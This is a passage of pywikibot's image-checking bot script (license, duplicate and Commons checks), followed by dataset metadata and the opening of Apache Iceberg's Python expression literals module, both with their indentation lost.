pywikibot.output(
"{} is on commons but it's a service image."
.format(self.imageName))
return True # continue with the check-part
pywikibot.output(self.imageName + ' is on commons!')
if self.image.file_is_shared():
pywikibot.output(
"But, the file doesn't exist on your project! Skip...")
# We have to skip the check part for that image because
# it's on commons but someone has added something on your
# project.
return False
if re.findall(r'\bstemma\b', self.imageName.lower()) and \
self.site.code == 'it':
pywikibot.output(
"{} has 'stemma' inside, means that it's ok."
.format(self.imageName))
return True
# It's not only on commons but the image needs a check
# the second usually is a url or something like that.
# Compare the two in equal way, both url.
repme = ((self.list_entry
+ "is also on '''Commons''': [[commons:File:%s]]")
% (self.imageName,
commons_image_with_this_hash.title(
with_ns=False)))
if (self.image.title(as_url=True)
== commons_image_with_this_hash.title(as_url=True)):
repme += ' (same name)'
self.report_image(self.imageName, self.rep_page, self.com, repme,
addings=False)
return True
def checkImageDuplicated(self, duplicates_rollback) -> bool:
"""Function to check the duplicated files."""
dupText = i18n.translate(self.site, duplicatesText)
dupRegex = i18n.translate(self.site, duplicatesRegex)
dupTalkText = i18n.translate(self.site, duplicates_user_talk_text)
# Head of the message given to the author
dupTalkHead = i18n.twtranslate(self.site, 'checkimages-doubles-head')
# Comment while bot reports the problem in the uploader's talk
dupComment_talk = i18n.twtranslate(self.site,
'checkimages-doubles-talk-comment')
# Comment used by the bot while it reports the problem in the image
dupComment_image = i18n.twtranslate(self.site,
'checkimages-doubles-file-comment')
imagePage = pywikibot.FilePage(self.site, self.imageName)
hash_found = imagePage.latest_file_info.sha1
duplicates = list(self.site.allimages(sha1=hash_found))
if not duplicates:
return False # Image deleted, no hash found. Skip the image.
if len(duplicates) > 1:
xdict = {'en':
'%(name)s has {{PLURAL:count'
'|a duplicate! Reporting it'
'|%(count)s duplicates! Reporting them}}...'}
pywikibot.output(i18n.translate('en', xdict,
{'name': self.imageName,
'count': len(duplicates) - 1}))
if dupText and dupRegex:
time_image_list = []
for dup_page in duplicates:
if (dup_page.title(as_url=True) != self.image.title(
as_url=True)
or self.timestamp is None):
try:
self.timestamp = (
dup_page.latest_file_info.timestamp)
except PageRelatedError:
continue
data = self.timestamp.timetuple()
data_seconds = time.mktime(data)
time_image_list.append([data_seconds, dup_page])
Page_older_image = self.important_image(time_image_list)
older_page_text = Page_older_image.text
# And if the images are more than two?
string = ''
images_to_tag_list = []
for dup_page in duplicates:
if dup_page == Page_older_image:
# the most used or oldest image
# not report also this as duplicate
continue
try:
DupPageText = dup_page.text
except NoPageError:
continue
if not (re.findall(dupRegex, DupPageText)
or re.findall(dupRegex, older_page_text)):
pywikibot.output(
'{} is a duplicate and has to be tagged...'
.format(dup_page))
images_to_tag_list.append(dup_page.title())
string += '* {}\n'.format(
dup_page.title(as_link=True, textlink=True))
else:
pywikibot.output(
"Already put the dupe-template in the files's page"
" or in the dupe's page. Skip.")
return False # Ok - Let's continue the checking phase
# true if the image are not to be tagged as dupes
only_report = False
# put only one image or the whole list according to the request
if '__images__' in dupText:
text_for_the_report = dupText.replace(
'__images__',
'\n{}* {}\n'.format(
string,
Page_older_image.title(
as_link=True, textlink=True)))
else:
text_for_the_report = dupText.replace(
'__image__',
Page_older_image.title(as_link=True, textlink=True))
# Two iteration: report the "problem" to the user only once
# (the last)
if len(images_to_tag_list) > 1:
for image_to_tag in images_to_tag_list[:-1]:
fp = pywikibot.FilePage(self.site, image_to_tag)
already_reported_in_past = fp.revision_count(self.bots)
# if you want only one edit, the edit found should be
# more than 0 -> num - 1
if already_reported_in_past > duplicates_rollback - 1:
only_report = True
break
# Delete the image in the list where we're write on
image = self.image_namespace + image_to_tag
text_for_the_report = re.sub(
r'\n\*\[\[:{}\]\]'.format(re.escape(image)),
'', text_for_the_report)
self.report(text_for_the_report, image_to_tag,
commImage=dupComment_image, unver=True)
if images_to_tag_list and not only_report:
fp = pywikibot.FilePage(self.site, images_to_tag_list[-1])
already_reported_in_past = fp.revision_count(self.bots)
image_title = re.escape(self.image.title(as_url=True))
from_regex = (r'\n\*\[\[:{}{}\]\]'
.format(self.image_namespace, image_title))
# Delete the image in the list where we're write on
text_for_the_report = re.sub(from_regex, '',
text_for_the_report)
# if you want only one edit, the edit found should be more
# than 0 -> num - 1
if already_reported_in_past > duplicates_rollback - 1 or \
not dupTalkText:
only_report = True
else:
self.report(
text_for_the_report, images_to_tag_list[-1],
dupTalkText
% (Page_older_image.title(with_ns=True),
string),
dupTalkHead, commTalk=dupComment_talk,
commImage=dupComment_image, unver=True)
if self.duplicatesReport or only_report:
if only_report:
repme = ((self.list_entry + 'has the following duplicates '
"('''forced mode'''):")
% self.image.title(as_url=True))
else:
repme = (
(self.list_entry + 'has the following duplicates:')
% self.image.title(as_url=True))
for dup_page in duplicates:
if (dup_page.title(as_url=True)
== self.image.title(as_url=True)):
# the image itself, not report also this as duplicate
continue
repme += '\n** [[:{}{}]]'.format(
self.image_namespace, dup_page.title(as_url=True))
result = self.report_image(self.imageName, self.rep_page,
self.com, repme, addings=False)
if not result:
return True # If Errors, exit (but continue the check)
if Page_older_image.title() != self.imageName:
# The image is a duplicate, it will be deleted. So skip the
# check-part, useless
return False
return True # Ok - No problem. Let's continue the checking phase
def report_image(self, image_to_report, rep_page=None, com=None,
rep_text=None, addings=True) -> bool:
"""Report the files to the report page when needed."""
rep_page = rep_page or self.rep_page
com = com or self.com
rep_text = rep_text or self.list_entry + '~~~~~'
if addings:
# Adding the name of the image in the report if not done already
rep_text = rep_text % image_to_report
another_page = pywikibot.Page(self.site, rep_page)
try:
text_get = another_page.get()
except NoPageError:
text_get = ''
except IsRedirectPageError:
text_get = another_page.getRedirectTarget().get()
# Don't care for differences inside brackets.
end = rep_text.find('(', max(0, rep_text.find(']]')))
if end < 0:
end = None
short_text = rep_text[rep_text.find('[['):end].strip()
reported = True
# Skip if the message is already there.
if short_text in text_get:
pywikibot.output('{} is already in the report page.'
.format(image_to_report))
reported = False
elif len(text_get) >= self.logFulNumber:
if self.logFullError:
raise LogIsFull(
'The log page ({}) is full! Please delete the old files '
'reported.'.format(another_page.title()))
pywikibot.output(
'The log page ({}) is full! Please delete the old files '
' reported. Skip!'.format(another_page.title()))
# Don't report, but continue with the check
# (we don't know if this is the first time we check this file
# or not)
else:
# Adding the log
another_page.put(text_get + rep_text, summary=com, force=True,
minor=False)
pywikibot.output('...Reported...')
return reported
def takesettings(self) -> None:
"""Function to take the settings from the wiki."""
settingsPage = i18n.translate(self.site, page_with_settings)
try:
if not settingsPage:
self.settingsData = None
else:
wikiPage = pywikibot.Page(self.site, settingsPage)
self.settingsData = []
try:
testo = wikiPage.get()
number = 1
for m in SETTINGS_REGEX.finditer(testo):
name = str(m.group(1))
find_tipe = str(m.group(2))
find = str(m.group(3))
imagechanges = str(m.group(4))
summary = str(m.group(5))
head = str(m.group(6))
text = str(m.group(7))
mexcatched = str(m.group(8))
tupla = [number, name, find_tipe, find, imagechanges,
summary, head, text, mexcatched]
self.settingsData += [tupla]
number += 1
if not self.settingsData:
pywikibot.output(
"You've set wrongly your settings, please take a "
'look to the relative page. (run without them)')
self.settingsData = None
except NoPageError:
pywikibot.output("The settings' page doesn't exist!")
self.settingsData = None
except Error:
pywikibot.output(
'Problems with loading the settigs, run without them.')
self.settingsData = None
self.some_problem = False
if not self.settingsData:
self.settingsData = None
# Real-Time page loaded
if self.settingsData:
pywikibot.output('>> Loaded the real-time page... <<')
else:
pywikibot.output('>> No additional settings found! <<')
def load_licenses(self) -> List[pywikibot.Page]:
"""Load the list of the licenses."""
catName = i18n.translate(self.site, category_with_licenses)
if not catName:
raise TranslationError(
'No allowed licenses category provided in '
'"category_with_licenses" dict for your project!')
pywikibot.output('\nLoading the allowed licenses...\n')
cat = pywikibot.Category(self.site, catName)
list_licenses = list(cat.articles())
if self.site.code == 'commons':
no_licenses_to_skip = pywikibot.Category(self.site,
'License-related tags')
for license_given in no_licenses_to_skip.articles():
if license_given in list_licenses:
list_licenses.remove(license_given)
pywikibot.output('')
# Add the licenses set in the default page as licenses to check
if self.pageAllowed:
try:
pageAllowedText = pywikibot.Page(self.site,
self.pageAllowed).get()
except (NoPageError, IsRedirectPageError):
pageAllowedText = ''
for nameLicense in self.load(pageAllowedText):
pageLicense = pywikibot.Page(self.site, nameLicense)
if pageLicense not in list_licenses:
# the list has wiki-pages
list_licenses.append(pageLicense)
return list_licenses
def miniTemplateCheck(self, template) -> bool:
"""Check if template is in allowed licenses or in licenses to skip."""
# the list_licenses are loaded in the __init__
# (not to load them multimple times)
if template in self.list_licenses:
self.license_selected = template.title(with_ns=False)
self.seems_ok = True
# let the last "fake" license normally detected
self.license_found = self.license_selected
return True
if template in self.hiddentemplates:
# if the whitetemplate is not in the images description, we don't
# care
try:
self.allLicenses.remove(template)
except ValueError:
return False
else:
self.whiteTemplatesFound = True
return False
def templateInList(self) -> None:
"""
Check if template is in list.
The problem is the calls to the Mediawiki system because they can be
pretty slow. While searching in a list of objects is really fast, so
first of all let's see if we can find something in the info that we
already have, then make a deeper check.
"""
for template in self.licenses_found:
if self.miniTemplateCheck(template):
break
if not self.license_found:
for template in self.licenses_found:
if template.isRedirectPage():
template = template.getRedirectTarget()
if self.miniTemplateCheck(template):
break
def smartDetection(self) -> Tuple[str, bool]:
"""
Detect templates.
The bot instead of checking if there's a simple template in the
image's description, checks also if that template is a license or
something else. In this sense this type of check is smart.
"""
self.seems_ok = False
self.license_found = None
self.whiteTemplatesFound = False
regex_find_licenses = re.compile(
r'(?<!\{)\{\{(?:[Tt]emplate:|)([^{]+?)[|\n<}]', re.DOTALL)
regex_are_licenses = re.compile(
r'(?<!\{)\{\{(?:[Tt]emplate:|)([^{]+?)\}\}', re.DOTALL)
while True:
self.loadHiddenTemplates()
self.licenses_found = self.image.templates()
templatesInTheImageRaw = regex_find_licenses.findall(
self.imageCheckText)
if not self.licenses_found and templatesInTheImageRaw:
# {{nameTemplate|something <- this is not a template, be sure
# that we haven't catch something like that.
licenses_TEST = regex_are_licenses.findall(self.imageCheckText)
if not self.licenses_found and licenses_TEST:
raise Error(
"Invalid or broken templates found in the image's "
'page {}!'.format(self.image))
self.allLicenses = []
if not self.list_licenses:
raise TranslationError(
'No allowed licenses found in "category_with_licenses" '
'category for your project!')
# Found the templates ONLY in the image's description
for template_selected in templatesInTheImageRaw:
tp = pywikibot.Page(self.site, template_selected)
for templateReal in self.licenses_found:
if (tp.title(as_url=True, with_ns=False).lower()
== templateReal.title(as_url=True,
with_ns=False).lower()):
if templateReal not in self.allLicenses:
self.allLicenses.append(templateReal)
break
if self.licenses_found:
self.templateInList()
if not self.license_found and self.allLicenses:
self.allLicenses = [
template.getRedirectTarget()
if template.isRedirectPage() else template
for template in self.allLicenses if template.exists()]
if self.allLicenses:
self.license_found = self.allLicenses[0].title()
# If it has "some_problem" it must check the additional settings.
self.some_problem = False
if self.settingsData:
# use additional settings
self.findAdditionalProblems()
if self.some_problem:
if self.mex_used in self.imageCheckText:
pywikibot.output('File already fixed. Skipping.')
else:
pywikibot.output(
"The file's description for {} contains {}..."
.format(self.imageName, self.name_used))
if self.mex_used.lower() == 'default':
self.mex_used = self.unvertext
if self.imagestatus_used:
reported = True
else:
reported = self.report_image(self.imageName)
if reported:
self.report(self.mex_used, self.imageName, self.text_used,
self.head_used, None,
self.imagestatus_used, self.summary_used)
else:
pywikibot.output('Skipping the file...')
self.some_problem = False
else:
if not self.seems_ok and self.license_found:
rep_text_license_fake = ((self.list_entry
+ "seems to have a ''fake license'',"
' license detected:'
' <nowiki>%s</nowiki>') %
(self.imageName, self.license_found))
printWithTimeZone(
'{} seems to have a fake license: {}, reporting...'
.format(self.imageName, self.license_found))
self.report_image(self.imageName,
rep_text=rep_text_license_fake,
addings=False)
elif self.license_found:
pywikibot.output('[[%s]] seems ok, license found: {{%s}}...'
% (self.imageName, self.license_found))
return (self.license_found, self.whiteTemplatesFound)
def load(self, raw) -> List[str]:
"""Load a list of objects from a string using regex."""
list_loaded = []
# I search with a regex how many user have not the talk page
# and i put them in a list (i find it more easy and secure)
regl = r"(\"|\')(.*?)\1(?:,|\])"
pl = re.compile(regl)
for xl in pl.finditer(raw):
word = xl.group(2).replace('\\\\', '\\')
if word not in list_loaded:
list_loaded.append(word)
return list_loaded
def skipImages(self, skip_number, limit) -> bool:
"""Given a number of files, skip the first -number- files."""
# If the images to skip are more the images to check, make them the
# same number
if skip_number == 0:
pywikibot.output('\t\t>> No files to skip...<<')
return False
if skip_number > limit:
skip_number = limit
# Print a starting message only if no images has been skipped
if not self.skip_list:
pywikibot.output(
i18n.translate(
'en',
'Skipping the first {{PLURAL:num|file|%(num)s files}}:\n',
{'num': skip_number}))
# If we still have pages to skip:
if len(self.skip_list) < skip_number:
pywikibot.output('Skipping {}...'.format(self.imageName))
self.skip_list.append(self.imageName)
if skip_number == 1:
pywikibot.output('')
return True
pywikibot.output('')
return False
@staticmethod
def wait(generator, wait_time) -> Generator[pywikibot.FilePage, None,
None]:
"""
Skip the images uploaded before x seconds.
Let the users to fix the image's problem alone in the first x seconds.
"""
printWithTimeZone(
'Skipping the files uploaded less than {} seconds ago..'
.format(wait_time))
for page in generator:
image = pywikibot.FilePage(page)
try:
timestamp = image.latest_file_info.timestamp
except PageRelatedError:
continue
now = pywikibot.Timestamp.utcnow()
delta = now - timestamp
if delta.total_seconds() > wait_time:
yield image
else:
pywikibot.warning(
'Skipping {}, uploaded {} {} ago..'
.format(image.title(), delta.days, 'days')
if delta.days > 0
else (image.title(), delta.seconds, 'seconds'))
def isTagged(self) -> bool:
"""Understand if a file is already tagged or not."""
# TODO: enhance and use textlib.MultiTemplateMatchBuilder
# Is the image already tagged? If yes, no need to double-check, skip
no_license = i18n.translate(self.site, txt_find)
if not no_license:
raise TranslationError(
'No no-license templates provided in "txt_find" dict '
'for your project!')
for i in no_license:
# If there are {{ use regex, otherwise no (if there's not the
# {{ may not be a template and the regex will be wrong)
if '{{' in i:
regexP = re.compile(
r'\{\{(?:template)?%s ?(?:\||\r?\n|\}|<|/) ?'
% i.split('{{')[1].replace(' ', '[ _]'), re.I)
result = regexP.findall(self.imageCheckText)
if result:
return True
elif i.lower() in self.imageCheckText:
return True
return False
def findAdditionalProblems(self) -> None:
"""Extract additional settings from configuration page."""
# In every tuple there's a setting configuration
for tupla in self.settingsData:
name = tupla[1]
find_tipe = tupla[2]
find = tupla[3]
find_list = self.load(find)
imagechanges = tupla[4]
if imagechanges.lower() == 'false':
imagestatus = False
elif imagechanges.lower() == 'true':
imagestatus = True
else:
pywikibot.error('Imagechanges set wrongly!')
self.settingsData = None
break
summary = tupla[5]
head_2 = tupla[6]
if head_2.count('==') == 2:
head_2 = re.findall(r'\s*== *(.+?) *==\s*', head_2)[0]
text = tupla[7] % self.imageName
mexCatched = tupla[8]
for k in find_list:
if find_tipe.lower() == 'findonly':
searchResults = re.findall(r'{}'.format(k.lower()),
self.imageCheckText.lower())
if searchResults:
if searchResults[0] == self.imageCheckText.lower():
self.some_problem = True
self.text_used = text
self.head_used = head_2
self.imagestatus_used = imagestatus
self.name_used = name
self.summary_used = summary
self.mex_used = mexCatched
break
elif find_tipe.lower() == 'find':
if re.findall(r'{}'.format(k.lower()),
self.imageCheckText.lower()):
self.some_problem = True
self.text_used = text
self.head_used = head_2
self.imagestatus_used = imagestatus
self.name_used = name
self.summary_used = summary
self.mex_used = mexCatched
continue
def checkStep(self) -> None:
"""Check a single file page."""
# something = Minimal requirements for an image description.
# If this fits, no tagging will take place
# (if there aren't other issues)
# MIT license is ok on italian wikipedia, let also this here
# Don't put "}}" here, please. Useless and can give problems.
something = ['{{']
# Allowed extensions
try:
allowed_formats = self.site.siteinfo.get(
'fileextensions', get_default=False)
except KeyError:
allowed_formats = []
else:
allowed_formats = [item['ext'].lower() for item in allowed_formats]
brackets = False
delete = False
notification = None
# get the extension from the image's name
extension = self.imageName.split('.')[-1]
# Load the notification messages
HiddenTN = i18n.translate(self.site, HiddenTemplateNotification)
self.unvertext = i18n.translate(self.site, n_txt)
di = i18n.translate(self.site, delete_immediately)
# The header of the Unknown extension's message.
dih = i18n.twtranslate(self.site, 'checkimages-unknown-extension-head')
# Text that will be add if the bot find a unknown extension.
din = i18n.twtranslate(self.site,
'checkimages-unknown-extension-msg') + ' ~~~~'
# Header that the bot will add if the image hasn't the license.
nh = i18n.twtranslate(self.site, 'checkimages-no-license-head')
# Summary of the delete immediately.
dels = i18n.twtranslate(self.site, 'checkimages-deletion-comment')
nn = i18n.translate(self.site, nothing_notification)
smwl = i18n.translate(self.site, second_message_without_license)
try:
self.imageCheckText = self.image.get()
except NoPageError:
pywikibot.output('Skipping {} because it has been deleted.'
.format(self.imageName))
return
except IsRedirectPageError:
pywikibot.output("Skipping {} because it's a redirect."
.format(self.imageName))
return
# Delete the fields where the templates cannot be loaded
regex_nowiki = re.compile(r'<nowiki>(.*?)</nowiki>', re.DOTALL)
regex_pre = re.compile(r'<pre>(.*?)</pre>', re.DOTALL)
self.imageCheckText = regex_nowiki.sub('', self.imageCheckText)
self.imageCheckText = regex_pre.sub('', self.imageCheckText)
# Deleting the useless template from the description (before adding
# sth in the image the original text will be reloaded, don't worry).
if self.isTagged():
printWithTimeZone('{} is already tagged...'.format(self.imageName))
return
# something is the array with {{, MIT License and so on.
for a_word in something:
if a_word in self.imageCheckText:
# There's a template, probably a license
brackets = True
# Is the extension allowed? (is it an image or f.e. a .xls file?)
if allowed_formats and extension.lower() not in allowed_formats:
delete = True
(license_found, hiddenTemplateFound) = self.smartDetection()
# Here begins the check block.
if brackets and license_found:
return
if delete:
pywikibot.output('{} is not a file!'.format(self.imageName))
if not di:
pywikibot.output('No localized message given for '
"'delete_immediately'. Skipping.")
return
# Some formatting for delete immediately template
dels = dels % {'adding': di}
di = '\n' + di
# Modify summary text
config.default_edit_summary = dels
canctext = di % extension
notification = din % {'file': self.image.title(as_link=True,
textlink=True)}
head = dih
self.report(canctext, self.imageName, notification, head)
return
if not self.imageCheckText.strip(): # empty image description
pywikibot.output(
"The file's description for {} does not contain a license "
' template!'.format(self.imageName))
if hiddenTemplateFound and HiddenTN:
notification = HiddenTN % self.imageName
elif nn:
notification = nn % self.imageName
head = nh
self.report(self.unvertext, self.imageName, notification, head,
smwl)
return
pywikibot.output('{} has only text and not the specific '
'license...'.format(self.imageName))
if hiddenTemplateFound and HiddenTN:
notification = HiddenTN % self.imageName
elif nn:
notification = nn % self.imageName
head = nh
self.report(self.unvertext, self.imageName, notification, head, smwl)
def main(*args: str) -> bool:
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
:param args: command line arguments
"""
# Command line configurable parameters
repeat = True # Restart after having check all the images?
limit = 80 # How many images check?
time_sleep = 30 # How many time sleep after the check?
skip_number = 0 # How many images to skip before checking?
waitTime = 0 # How many time sleep before the check?
commonsActive = False # Is there's an image with the same name at commons?
normal = False # Check the new images or use another generator?
urlUsed = False # Use the url-related function instead of the new-pages
regexGen = False # Use the regex generator
duplicatesActive = False # Use the duplicate option
duplicatesReport = False # Use the duplicate-report option
max_user_notify = None
sendemailActive = False # Use the send-email
logFullError = True # Raise an error when the log is full
generator = None
unknown = [] # unknown parameters
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
# Here below there are the local parameters.
for arg in local_args:
option, _, value = arg.partition(':')
if option == '-limit':
limit = int(value or pywikibot.input(
'How many files do you want to check?'))
elif option == '-sleep':
time_sleep = int(value or pywikibot.input(
'How many seconds do you want runs to be apart?'))
elif option == '-break':
repeat = False
elif option == '-nologerror':
logFullError = False
elif option == '-commons':
commonsActive = True
elif option == '-duplicatesreport':
duplicatesReport = True
elif option == '-duplicates':
duplicatesActive = True
duplicates_rollback = int(value or 1)
elif option == '-maxusernotify':
max_user_notify = int(value or pywikibot.input(
'What should be the maximum number of notifications per user '
'per check?'))
elif option == '-sendemail':
sendemailActive = True
elif option == '-skip':
skip_number = int(value or pywikibot.input(
'How many files do you want to skip?'))
elif option == '-wait':
waitTime = int(value or pywikibot.input(
'How many time do you want to wait before checking the '
'files?'))
elif option == '-start':
firstPageTitle = value or pywikibot.input(
'From which page do you want to start?')
namespaces = tuple(
ns + ':' for ns in site.namespace(Namespace.FILE, True))
if firstPageTitle.startswith(namespaces):
firstPageTitle = firstPageTitle.split(':', 1)[1]
generator = site.allimages(start=firstPageTitle)
repeat = False
elif option == '-page':
regexPageName = value or pywikibot.input(
'Which page do you want to use for the regex?')
repeat = False
regexGen = True
elif option == '-url':
regexPageUrl = value or pywikibot.input(
'Which url do you want to use for the regex?')
urlUsed = True
repeat = False
regexGen = True
elif option == '-regex':
regexpToUse = value or pywikibot.input(
'Which regex do you want to use?')
generator = 'regex'
repeat = False
elif option == '-cat':
cat_name = value or pywikibot.input('In which category do I work?')
cat = pywikibot.Category(site, 'Category:' + cat_name)
generator = cat.articles(namespaces=[6])
repeat = False
elif option == '-ref':
ref_name = value or pywikibot.input(
'The references of what page should I parse?')
ref = pywikibot.Page(site, ref_name)
generator = ref.getReferences(namespaces=[6])
repeat = False
else:
unknown.append(arg)
if not generator:
normal = True
# Ensure that the bot is localized and right command args are given
if site.code not in project_inserted:
additional_text = ('Your project is not supported by this script.\n'
'To allow your project in the script you have to '
'add a localization into the script and add your '
'project to the "project_inserted" list!')
else:
additional_text = ''
if suggest_help(unknown_parameters=unknown,
additional_text=additional_text):
return False
# Reading the log of the new images if another generator is not given.
if normal:
if limit == 1:
pywikibot.output('Retrieving the latest file for checking...')
else:
pywikibot.output('Retrieving the latest {} files for checking...'
.format(limit))
while True:
# Defing the Main Class.
Bot = checkImagesBot(site, sendemailActive=sendemailActive,
duplicatesReport=duplicatesReport,
logFullError=logFullError,
max_user_notify=max_user_notify)
if normal:
generator = pg.NewimagesPageGenerator(total=limit, site=site)
# if urlUsed and regexGen, get the source for the generator
if urlUsed and regexGen:
textRegex = site.getUrl(regexPageUrl, no_hostname=True)
# Not an url but a wiki page as "source" for the regex
elif regexGen:
pageRegex = pywikibot.Page(site, regexPageName)
try:
textRegex = pageRegex.get()
except NoPageError:
pywikibot.output("{} doesn't exist!".format(pageRegex.title()))
textRegex = '' # No source, so the bot will quit later.
# If generator is the regex' one, use your own Generator using an url
# or page and a regex.
if generator == 'regex' and regexGen:
generator = Bot.regexGenerator(regexpToUse, textRegex)
Bot.takesettings()
if waitTime > 0:
generator = Bot.wait(generator, waitTime)
for image in generator:
# Setting the image for the main class
Bot.setParameters(image)
if skip_number and Bot.skipImages(skip_number, limit):
continue
# Check on commons if there's already an image with the same name
if commonsActive and site.family.name != 'commons':
if not Bot.checkImageOnCommons():
continue
# Check if there are duplicates of the image on the project
if duplicatesActive:
if not Bot.checkImageDuplicated(duplicates_rollback):
continue
Bot.checkStep()
if repeat:
pywikibot.output('Waiting for {} seconds,'.format(time_sleep))
pywikibot.sleep(time_sleep)
else:
break
return True
if __name__ == '__main__':
start = time.time()
ret = False
try:
ret = main()
except KeyboardInterrupt:
ret = True
finally:
if ret is not False:
final = time.time()
delta = int(final - start)
pywikibot.output('Execution time: {} seconds\n'.format(delta))
| 42.243917
| 79
| 0.552727
|
e8a9fa591534a096f0efd866ca602bf262a89d5d
| 17,323
|
py
|
Python
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 58
|
2019-09-10T20:51:26.000Z
|
2022-03-22T11:06:09.000Z
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 37
|
2019-11-03T19:19:44.000Z
|
2022-03-17T01:03:34.000Z
|
python/iceberg/api/expressions/literals.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 26
|
2019-08-28T23:59:03.000Z
|
2022-03-04T08:54:08.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
from decimal import (Decimal,
ROUND_HALF_UP)
import uuid
import pytz
from .expression import (FALSE,
TRUE)
from .java_variables import (JAVA_MAX_FLOAT,
JAVA_MIN_FLOAT)
from ..types.type import TypeID
class Literals(object):
EPOCH = datetime.datetime.utcfromtimestamp(0)
EPOCH_DAY = EPOCH.date()
@staticmethod # noqa: C901
def from_(value):
if value is None:
raise RuntimeError("Cannot create an expression literal from None")
if isinstance(value, bool):
return BooleanLiteral(value)
elif isinstance(value, int):
if Literal.JAVA_MIN_INT < value < Literal.JAVA_MAX_INT:
return IntegerLiteral(value)
return LongLiteral(value)
elif isinstance(value, float):
if Literal.JAVA_MIN_FLOAT < value < Literal.JAVA_MAX_FLOAT:
return FloatLiteral(value)
return DoubleLiteral(value)
elif isinstance(value, str):
return StringLiteral(value)
elif isinstance(value, uuid.UUID):
return UUIDLiteral(value)
elif isinstance(value, bytearray):
return BinaryLiteral(value)
elif isinstance(value, bytes):
return FixedLiteral(value)
elif isinstance(value, Decimal):
return DecimalLiteral(value)
else:
raise RuntimeError("Unimplemented Type Literal")
@staticmethod
def above_max():
return ABOVE_MAX
@staticmethod
def below_min():
return BELOW_MIN
class Literal(object):
JAVA_MAX_INT = 2147483647
JAVA_MIN_INT = -2147483648
JAVA_MAX_FLOAT = 3.4028235E38
JAVA_MIN_FLOAT = -3.4028235E38
@staticmethod # noqa: C901
def of(value):
if isinstance(value, bool):
return BooleanLiteral(value)
elif isinstance(value, int):
if value < Literal.JAVA_MIN_INT or value > Literal.JAVA_MAX_INT:
return LongLiteral(value)
return IntegerLiteral(value)
elif isinstance(value, float):
if value < Literal.JAVA_MIN_FLOAT or value > Literal.JAVA_MAX_FLOAT:
return DoubleLiteral(value)
return FloatLiteral(value)
elif isinstance(value, str):
return StringLiteral(value)
elif isinstance(value, uuid.UUID):
return UUIDLiteral(value)
elif isinstance(value, bytes):
return FixedLiteral(value)
elif isinstance(value, bytearray):
return BinaryLiteral(value)
elif isinstance(value, Decimal):
return DecimalLiteral(value)
def to(self, type):
raise NotImplementedError()
class BaseLiteral(Literal):
def __init__(self, value):
self.value = value
def to(self, type):
raise NotImplementedError()
def __eq__(self, other):
if id(self) == id(other):
return True
elif other is None or not isinstance(other, BaseLiteral):
return False
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "BaseLiteral(%s)" % str(self.value)
def __str__(self):
return str(self.value)
class ComparableLiteral(BaseLiteral):
def __init__(self, value):
super(ComparableLiteral, self).__init__(value)
def to(self, type):
raise NotImplementedError()
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if self.value is None:
return True
if other is None or other.value is None:
return False
return self.value < other.value
def __gt__(self, other):
if self.value is None:
return False
if other is None or other.value is None:
return True
return self.value > other.value
def __le__(self, other):
if self.value is None:
return True
if other is None or other.value is None:
return False
return self.value <= other.value
def __ge__(self, other):
if self.value is None:
return False
if other is None or other.value is None:
return True
return self.value >= other.value
class AboveMax(Literal):
def __init__(self):
super(AboveMax, self).__init__()
def value(self):
raise RuntimeError("AboveMax has no value")
def to(self, type):
raise RuntimeError("Cannot change the type of AboveMax")
def __str__(self):
return "aboveMax"
class BelowMin(Literal):
def __init__(self):
super(BelowMin, self).__init__()
def value(self):
raise RuntimeError("BelowMin has no value")
def to(self, type):
raise RuntimeError("Cannot change the type of BelowMin")
def __str__(self):
return "belowMin"
class BooleanLiteral(ComparableLiteral):
def __init__(self, value):
super(BooleanLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.BOOLEAN:
return self
class IntegerLiteral(ComparableLiteral):
def __init__(self, value):
super(IntegerLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.INTEGER:
return self
elif type_var.type_id == TypeID.LONG:
return LongLiteral(self.value)
elif type_var.type_id == TypeID.FLOAT:
return FloatLiteral(float(self.value))
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(float(self.value))
elif type_var.type_id == TypeID.DATE:
return DateLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class LongLiteral(ComparableLiteral):
def __init__(self, value):
super(LongLiteral, self).__init__(value)
def to(self, type_var): # noqa: C901
if type_var.type_id == TypeID.INTEGER:
if Literal.JAVA_MAX_INT < self.value:
return ABOVE_MAX
elif Literal.JAVA_MIN_INT > self.value:
return BELOW_MIN
return IntegerLiteral(self.value)
elif type_var.type_id == TypeID.LONG:
return self
elif type_var.type_id == TypeID.FLOAT:
return FloatLiteral(float(self.value))
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(float(self.value))
elif type_var.type_id == TypeID.TIME:
return TimeLiteral(self.value)
elif type_var.type_id == TypeID.TIMESTAMP:
return TimestampLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
